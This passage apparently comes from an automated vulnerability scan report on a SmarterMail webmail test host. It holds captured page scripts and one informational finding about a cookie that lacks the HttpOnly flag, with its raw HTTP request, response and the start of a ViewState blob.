           SpawnHyperWindow("/Main/frmPopupAddToOutlook.aspx?type=" + type + "&name=" + name + "&shareowner=" + shareowner + "&calname=" + calname, 450, 270);
       }
       function DoPrint() {
           if (document.customPrintJob) document.customPrintJob();
           else PrintWindow();
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
Initialize();UpdateSidebarCounts('UserEmail', 0);
ChangeFolderList('fl-1140420008','Inbox');
UpdateSidebarCounts('UserRSS', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmCalendar\x2easpx?'); });
$(function() { $('#ScrollingItemContainer').dailyCalendarItem({"Occurrences":[],"AllDayTableID":"ctl00_MPH_calDaily_tblAllDay","AllDayCellID":"ctl00_MPH_calDaily_cellAllDay","TableID":"tblDaily","CellIDPrefix":"tblDaily_Hour","Columns":0}); });Sys.Application.initialize();
$(function() { $('#ctl00_TitleBar_menuCalendarSourceTitle').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceManage":"SpawnHyperWindow(\u0027/Main/Sharing/frmMyShares.aspx?popup=true\u0027, 700, 400);"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_BPH_menuCalendar').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_menuCalendar_menuGlobalNew_b4e4ec7cf4a64e049e3bfd8f4df55825":"OpenNewMessage(\u0027/Main/frmCompose.aspx\u0027, 800, 600); return false;","ctl00_BPH_menuCalendar_menuGlobalNew_b5a5250bcdca48709b0e116ff7243519":"OpenNewMessage(\u0027/Main/frmContact.aspx\u0027, 600, 400); return false;","ctl00_BPH_menuCalendar_menuGlobalNew_b1ad3d6c053c4d92a5ac8c03dca4a703":"OpenNewMessage(\u0027/Main/Calendar/frmEvent.aspx\u0027, 600, 400); return false;","ctl00_BPH_menuCalendar_menuGlobalNew_d6ecd73ff32f4cc48bbb81f7c18cb647":"OpenNewMessage(\u0027/Main/frmTask.aspx\u0027, 600, 400); return false;","ctl00_BPH_menuCalendar_menuGlobalNew_ff2ab4b2477646cf8a90669ada6e87e5":"OpenNewMessage(\u0027/Main/frmNote.aspx\u0027, 600, 400); return false;","ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook":"javascript: OpenPopup(\u0027calendar\u0027,\u0027\u0027,\u0027euser\u0027,\u0027My\\x20Calendar\u0027)","ctl00_BPH_menuCalendar_menuCalView_menuColumns":"ShowColumnSelector();"},"ClientCallbacks":{}}); });
function DoDeleteQuery_ctl00_BPH_btnDelete() {
   if (!self.ctl00_MPH_calAll_grdAllAppts) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_calAll_grdAllAppts.GetSelectedRowCount ? ctl00_MPH_calAll_grdAllAppts.GetSelectedRowCount() : ctl00_MPH_calAll_grdAllAppts.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDelete);
}
function DoDelete_ctl00_BPH_btnDelete() { __doPostBack('ctl00$BPH$btnDelete',''); }
function DoEdit_ctl00_BPH_btnEdit() {
   if(self.ctl00_MPH_calAll_grdAllAppts == null || !self.ctl00_MPH_calAll_grdAllAppts.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_calAll_grdAllAppts.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_calAll_grdAllAppts.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_calAll_grdAllAppts; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_calAll_grdAllAppts.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You can not edit multiple items at once.');
   }
}
$(function() { $('#ctl00_TPH_tsTabs').hyperTabStrip({"MultiPageClientID":null,"FunctionMap":{"ctl00_TPH_tsTabs_tabDaily":"SelectTab(\u0027daily\u0027);","ctl00_TPH_tsTabs_tabWeekly":"SelectTab(\u0027weekly\u0027);","ctl00_TPH_tsTabs_tabMonthly":"SelectTab(\u0027monthly\u0027);","ctl00_TPH_tsTabs_tabAll":"SelectTab(\u0027all\u0027);"},"PageViewMap":{},"ClientCallbacks":{}}); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_calDatePicker_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":true,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$calDatePicker\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_calDatePicker_ClientState","enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false}, {"columnHeaderClick":ClearCalendar,"dateClick":ClearCalendar,"rowHeaderClick":ClearCalendar,"viewSelectorClick":SelectMonth}, null, $get("ctl00_MPH_calDatePicker"));
});
$(function() { $('#ctl00_MPH_rightClickMenu').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_rightClickMenu_menuEdit":"OpenItem();"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_MPH_rightClickAddMenu').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_rightClickAddMenu_menuNew":"NewItem();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


6.3. http://vulnerable.smartermail.site:9998/Main/frmMessage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmMessage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Main/frmMessage.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: vulnerable.smartermail.site:9998
Cookie: SelectedLanguage=; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserEmail"}; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:57:01 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=521eph45ejlri1b1hykmc1ft; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Sat, 03-Oct-2020 01:57:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 26609



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_head1"><title>
    - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Print/&amp;rtl=false" rel="stylesheet" type="text/css" /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="PreviewContent">
   <form method="post" action="frmMessage.aspx" id="aspnetForm" class="PreviewContent">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwODA2NTM4NDAPFgoeCF9fX1RpdGxlZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHhdNZXNzYWdlU3BlY2lmaWNWaWV3VHlwZQUEaHRtbB4IVmlld1R5cGUFBGh0bWwWAmYPZBYCAgMPZBYIAgMPFgIeB1Zpc2libGVnFgQCAQ9kFg4CAQ8PFgYeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFyAFPcGVuTmV3TWVzc2FnZSgnXHgyZk1haW5ceDJmZnJtQ29tcG9zZVx4MmVhc3B4XHgzZmZvbGRlclx4M2RJbmJveFx4MjZtZXNzYWdlaWRceDNkNDI5NDk2NzI5NVx4MjZpc2RyYWZ0XHgzZHRydWVceDI2dXNlclx4M2RldXNlclx4MjZtYXBwZWRceDNkRmFsc2VceDI2ZnJvbVByZXZpZXdceDNkdHJ1ZVx4MjZyb3dOdW1iZXJceDNkMCcsIDgwMCwgNjAwKR8FaGRkAgMPDxYGHg5OYXZpZ2F0ZVRhcmdldAUHX3BhcmVudB8GZR8HBcIBT3Blbk5ld01lc3NhZ2UoJ1x4MmZNYWluXHgyZmZybUNvbXBvc2VceDJlYXNweFx4M2ZhY3Rpb25ceDNkcmVwbHlceDI2Zm9sZGVyXHgzZEluYm94XHgyNnVpZFx4M2Q0Mjk0OTY3Mjk1XHgyNnVzZXJceDNkZXVzZXJceDI2bWFwcGVkXHgzZEZhbHNlXHgyNmZyb21QcmV2aWV3XHgzZHRydWVceDI2cm93TnVtYmVyXHgzZDAnLCA4MDAsIDYwMClkZAIFDw8WBh8IBQdfcGFyZW50HwZlHwcFxwFPcGVuTmV3TWVzc2FnZSgnXHgyZk1haW5ceDJmZnJtQ29tcG9zZVx4MmVhc3B4XHgzZmFjdGlvblx4M2RyZXBseXRvYWxsXHgyNmZvbGRlclx4M2RJbmJveFx4MjZ1aWRceDNkNDI5NDk2NzI5NVx4MjZ1c2VyXHgzZGV1c2VyXHgyNm1hcHBlZFx4M2RGYWxzZVx4MjZmcm9tUHJldmlld1x4M2R0cnVlXHgyNnJvd051bWJlclx4M2QwJywgODAwLCA2MDApZGQCBw8PFgYfCAUHX3BhcmVudB8GZR8HBcQBT3Blbk5ld01lc3NhZ2UoJ1x4MmZNYWluXHgyZmZybUNvbXBvc2VceDJlYXNweFx4M2ZhY3Rpb25ceDNkZm9yd2FyZFx4MjZmb2xkZXJceDNkSW5ib3hceDI2dWlkXHgzZDQyOTQ5NjcyOTVceDI2dXNlclx4M2RldXNlclx4MjZtYXBwZWRceDNkRmFsc2VceDI2ZnJvbVByZXZpZXdceDNkdHJ1ZVx4MjZyb3dOdW1iZXJceDNkMCcsIDgwMCwgNjAwKWRkAgsPDxYCHwVoZGQCDQ8WAh8FaGQCDw8WAh8FaGQCAw9kFgICAQ8PFgIfBWhkZAIFD2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYEAgIPFgIfBWhkAgMPFgIfBWhkAgYPZBYCZg9kFgICAQ8WAh8FaGQCBw9kFgICAw9kFgICAQ9kFgJmD2QWAgIBDw8WAh4EVGV4dGVkZBgHBR1jdGwwMCRUUEgkdGFiU2VjdGlvbiR0YWJUYXNrcw8yxQsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAABkBUYXNrcwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUeY3RsMDAkTmF2UEgkdGFiVmlldyR0YWJIZWFkZXJzDzLGCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQEhlYWRlcgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUfY3RsMDAkVFBIJHRhYlNlY3Rpb24kdGFiTWVzc2FnZQ8yxwsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACEBNZXNzYWdlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRtjdGwwMCROYXZQSCR0YWJWaWV3JHRhYlRleHQPMskLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAApAUGxhaW5UZXh0AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRpjdGwwMCROYXZQSCR0YWJWaWV3JHRhYlJhdw8yygsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBW